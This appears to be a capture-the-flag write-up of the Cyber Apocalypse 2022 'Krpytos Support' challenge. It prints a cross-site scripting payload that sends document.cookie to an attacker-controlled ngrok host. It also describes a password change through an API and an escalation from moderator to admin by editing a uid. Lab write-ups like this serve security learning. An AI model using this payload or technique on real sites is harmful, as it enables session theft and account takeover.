Cyber Apocalypse 2022

Krpytos Support

Solved By : thewhiteh4t

In this one we land on a support page where we can send a POST request, it also contains a backend button which takes us to a login page…

first I thought its a cookie stealing challenge so I send the following payload :

<img src=x onerror=this.src='<NGROK-LINK-HERE>/?'+document.cookie;>

and I got a JWT :


decoded :

  "username": "moderator",
  "uid": 100,
  "iat": 1652534885

and I got two interesting things here, now the cookie did not work for login for some reason so I went back to enum and found an API endpoint :


using XHR I sent the following request to change the password :

logged in with the new password :

but moderator doesn’t have the flag so I had to escalate to admin…

using the same payload above I just changed the uid from 100 to 1 and logged in again, I could have got it one go but well…

Published on : 21 May 2022